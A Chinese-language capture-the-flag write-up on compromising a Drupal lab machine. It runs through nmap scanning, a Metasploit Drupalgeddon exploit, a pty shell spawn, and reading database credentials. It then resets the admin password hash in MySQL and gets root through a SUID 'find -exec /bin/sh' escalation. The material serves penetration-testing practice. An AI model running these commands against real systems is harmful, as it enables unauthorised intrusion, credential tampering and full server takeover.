扫描靶机IP
然后nmap一波。
开放了80端口,访问。
首次访问需要把IP放到hosts中。
cd /etc
find . -name "host*"
vim ./hosts
网站是Drupal服务,上神器msf。
七个可用模块。
使用exploit/multi/http/drupal_drupageddon
设置好options启动攻击
弹回了meterpreter
收集主机信息
进入shell
ls一下,发现flag1
看下权限,发现不是root,需要提权。
根据flag信息,查看配置。
在sites/default/settings.php中
看到了flag2.txt和数据库信息。
直接mysql -udbuser -p,但是不能进入mysql命令行。
查看到了python版本信息。使用python进入交互shell。
python -c "import pty;pty.spawn('/bin/bash')"
再使用
mysql -udbuser -p
成功进入mysql命令行
在users表里发现两个用户。
但是密码被加密了。
用重置密码。
使用drupal自带的hash加密
php scripts/password-hash.sh drupall > pwd.txt
再次进入mysql,对密码进行重置。
update users set pass = '$S$DDuvmUjUDJkHrjjOarywjMVR0Ne/osYlPfLPtWH1bRMbHbZyADey' where name = 'admin';
到网站上,用账号密码登陆。
成功登陆。
找到了flag3
在目录里查找到flag4
根据提示,要进入root目录。但是发现被拒绝。
查找系统上运行的所有suid可执行文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
再查找。
find ./ aaa -exec '/bin/sh' \;
成功提权为root。
再进入root目录,成功进入,并找到finalflag。
suid提权
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。